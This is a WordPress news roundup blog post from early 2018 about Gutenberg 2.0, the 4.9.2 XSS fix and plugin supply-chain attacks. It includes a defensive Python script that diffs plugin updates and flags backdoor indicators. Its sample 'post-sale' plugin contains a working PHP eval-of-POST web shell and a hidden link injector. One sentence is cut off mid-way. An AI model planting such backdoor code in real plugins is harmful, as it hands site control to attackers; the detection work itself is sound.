The WordPress Update: WordPress 4.9.2 Fixes XSS Vulnerability And Gutenberg Version 2.0 Released

WordPress News You Can Use January 2018 Blue

Welcome, friends, to the first edition of a new feature here at WP Superstars:

The news!

We may not have invented the concept of delivering news to interested readers (though I think we are one of the first to do it), but we plan to provide a curated roundup of the best WordPress news for each month going forward.

If you want to keep abreast of the latest information about WordPress but don’t have time to do the work yourself, this is for you!

Let’s jump in, starting with a topic that will soon become all-too-familiar to you…

Gutenberg 2.0 marches on towards WordPress 5.0

It wouldn’t be a WordPress news roundup without a hefty dose of the upcoming Gutenberg editor.

If you’re not already familiar, the Gutenberg editor is a complete rebuild of the editor that you use to write WordPress posts and pages. It’s not just an aesthetic change, either. It will redefine the way you create content by moving to something called “block-based” editing.

In the biggest news this month, we saw a major Gutenberg milestone – version 2.0. You can read the complete (and lengthy) list of changes in the Gutenberg 2.0 release post.

Some of my favorite feature additions are:

  • The ability to directly paste copied images into Gutenberg
  • A button to copy the entire document, which is essential because of Gutenberg’s block-based nature
  • A better system for publishing posts

Moving away from the development front, WP Tavern also put together “A Collection of Gutenberg Conversations, Resources, and Videos”.

It’s a great post that contains tons of deep discussions and tutorials for getting more out of Gutenberg. Make sure you read the comments, as well, because tons of smart people have contributed additional links that are also worth checking out.

That’s it for Gutenberg news this month – but this definitely won’t be the last time you see Gutenberg in our news roundups.

You can now try Gutenberg without installing it on your own site

This one doesn’t count as news. But on the heels of the Gutenberg news, it’s definitely something new worth sharing!

Because the Gutenberg editor is still in beta, it’s not a good idea to install it on a live site. But for casual users who don’t have local development sites, that beta-status makes it difficult to actually play around with the new editor.

No more!

Tom J Nowell put together an awesome frontend implementation of Gutenberg that allows anyone to play around with the editor right from any browser.

To give it a spin, just head here and explore the aptly named Frontenberg.

WordPress 4.9.2 fixes an XSS vulnerability and other bugs

On January 16th, we got a new security and maintenance release in the form of WordPress 4.9.2.

It didn’t add any new functionality, but it did fix an XSS vulnerability as well as 21 other bugs.

As with all security and maintenance releases, if you haven’t already updated your site, you need to go update right now. Sites with automatic background updates enabled (the default for minor releases since WordPress 3.7) should already have it; check your version in the dashboard rather than assuming.

Besides security and maintenance fixes, we’re not going to see any other new features until WordPress 5.0 ships with the Gutenberg editor.

WordPress supply chain attacks are a real concern

In the latter part of 2017, we saw the rise of a class of attack called “supply chain attacks.”

In this type of attack, the malicious actor inserts themselves into an existing trust relationship between a software author and that author’s users, so the malicious code arrives through a channel the victim already trusts.

Here’s how we’ve been seeing that apply to WordPress:

A malicious actor purchases a previously trusted plugin and inserts a backdoor into its code. The thousands of sites running that plugin then happily install the update because, up until the sale, the plugin had worked perfectly and its original author was a trusted actor. Nothing about the update looks unusual: it has the same plugin slug, comes through the normal update channel, and shows up as just another version bump.

What’s the benefit to the malicious actor? Well, so far we’ve seen them use the backdoor to:

  • Insert backlinks for SEO purposes
  • Mine cryptocurrency (this is the downside of those soaring cryptocurrency prices)

Wordfence has done a great job both detecting and reporting on this issue. Their recent article, WordPress Supply Chain Attacks: An Emerging Threat, is an absolute must-read.

It lays out:

  • A deeper explanation of what supply chain attacks are
  • Why malicious actors want to target WordPress with these types of attacks
  • Why trusted plugin authors are willing to sell their plugins
  • How you can protect your website from such attacks

If such exploits continue, I imagine we might also see some changes at

One potential fix would be to apply extra review to plugins whose ownership has recently changed, so that a buyer of a previously trusted plugin could not ship a backdoor to its existing user base as easily.
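Reviewing what a plugin update actually changed before applying it is one concrete defense against a hand-off like the one described above. The script below is an added example, not code from this page, from Wordfence, or from WordPress.org: it records a SHA-256 baseline of a plugin’s files while the plugin is still trusted, diffs a later version against that baseline, and runs a handful of heuristic backdoor indicators over only the added or changed files. The two plugin versions, the indicator patterns, and names such as `example-plugin.php` and `ep_links` are constructed for illustration.

```python
"""Review a WordPress plugin update against a hash baseline and flag backdoor indicators.

Added example with constructed sample data; not code from the page, from Wordfence
or from WordPress.org. Run it directly to print a report for the two toy versions."""
import hashlib
import os
import re
import tempfile

# Heuristic indicators of code a backdoored plugin tends to carry. These patterns are
# this example's own assumptions, not a vendor signature set; expect false positives
# on legitimate obfuscated or minified code, so treat a hit as "read this file", not proof.
INDICATORS = {
    "eval of decoded payload": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "request data reaching eval/exec": re.compile(
        r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b"),
    "runtime function built from request data": re.compile(
        r"\bcreate_function\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b"),
    "remote file inclusion": re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I),
    "hidden link injected into page output": re.compile(
        r"display\s*:\s*none[^\n]*<a\s+href=|<a\s+href=[^\n]*display\s*:\s*none", re.I),
}


def hash_tree(root):
    """Map each file path (relative to root, '/'-separated) to its SHA-256 hex digest."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                hashes[rel] = hashlib.sha256(fh.read()).hexdigest()
    return hashes


def diff_trees(baseline, current):
    """Return (added, removed, changed) path lists between two hash maps."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, removed, changed


def scan_file(path):
    """Return the names of every indicator that matches the file's text."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def review_update(baseline, new_root):
    """Diff a candidate plugin version against the baseline; scan only added/changed files."""
    current = hash_tree(new_root)
    added, removed, changed = diff_trees(baseline, current)
    findings = {}
    for rel in added + changed:
        hits = scan_file(os.path.join(new_root, rel))
        if hits:
            findings[rel] = hits
    return {"added": added, "removed": removed, "changed": changed, "findings": findings}


# Constructed sample: version 1 as shipped by the original (trusted) author ...
CLEAN_V1 = {
    "example-plugin.php": (
        "<?php\n/* Plugin Name: Example Plugin */\n"
        "add_action('wp_footer', 'ep_footer');\n"
        "function ep_footer() { echo '<p>Thanks for reading.</p>'; }\n"),
    "includes/helpers.php": "<?php\nfunction ep_escape($s) { return esc_html($s); }\n",
}
# ... and version 2 after a hypothetical sale: an SEO link injector and a remote-eval backdoor.
BACKDOORED_V2 = dict(CLEAN_V1)
BACKDOORED_V2["example-plugin.php"] = CLEAN_V1["example-plugin.php"] + (
    "add_action('wp_footer', 'ep_links');\n"
    "function ep_links() { echo '<div style=\"display:none\">"
    "<a href=\"http://example.invalid/\">cheap stuff</a></div>'; }\n")
BACKDOORED_V2["includes/update.php"] = (
    "<?php\nif (isset($_POST['k'])) { eval(base64_decode($_POST['k'])); }\n")


def write_tree(root, files):
    """Materialise a {relative path: content} map under root."""
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Baseline the trusted version, then review the post-sale version against it."""
    with tempfile.TemporaryDirectory() as tmp:
        v1, v2 = os.path.join(tmp, "v1"), os.path.join(tmp, "v2")
        write_tree(v1, CLEAN_V1)
        write_tree(v2, BACKDOORED_V2)
        baseline = hash_tree(v1)  # record this while the plugin is still trusted
        return review_update(baseline, v2)


if __name__ == "__main__":
    report = demo()
    for key in ("added", "removed", "changed"):
        print(f"{key}: {report[key]}")
    for path, hits in report["findings"].items():
        print(f"FLAG {path}: {', '.join(hits)}")
```

In practice you would take the baseline from the plugin version you already run (or from a copy of the same version downloaded directly from the plugin directory), point `review_update` at the unpacked update before activating it, and read every flagged file by hand. The diff is the important part: a backdoor has to be in a file that was added or changed, so that is the whole set you need to read, and the indicators only tell you where to start.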

If you’d like to learn even more about this issue, I also recommend reading some of these older articles:

Why all-in-one security plugins aren’t necessarily all you need to keep your site safe

I’ve been using WordPress for about ten years now.

In that time, I’ve built enough websites that I’d have to use my toes to keep counting them.

And over those ten years and those ten-plus different sites, I’ve never been hacked.

You might be saying, “congratulations, Colin! But what’s the point?”

Well, the point is that I’ve never used an all-in-one security plugin in those ten years of safety.

And that brings me to the next article I want to share – Still Not Using Plugins for Security by Mika Epstein. It’s brief, but it echoes a lot of things I feel based on my own experience using WordPress.

Mika argues, in part, that all-in-one security plugins make people feel complacent and lose the important sense of vigilance required to keep a site secure.

I don’t think the takeaway is that everyone should stop using security plugins; the situation is by no means that simple.

But I think Mika’s post is a good reminder that security is a set of principles and practices that you need to be constantly aware of – it’s not just something you can activate a plugin for and forget about.

A collection of interesting year in review posts

To most people, the new year means celebration and resolutions.

But to those plugged into the WordPress community, a new year means just one thing:

Year in review blog posts from WordPress businesses.

Here are two of my favorites:

And if you want a really deep reminder of everything that happened in 2017, check out WP Tavern’s WPWeekly 2017 Year in Review.

Have a successful year with WordPress in 2018

If there’s one thing that’s true, it’s this:

For most WordPress users, 2018 will be the biggest change to WordPress that they’ve ever experienced (yes, I’m back on about Gutenberg again).

Long-term, I think that change will be a good thing. But in the short term, casual users and developers alike will need to adapt.

Ride it out, keep learning, and enjoy what WordPress has to offer in 2018.

That’s all for the news – check back next month for more great stuff!
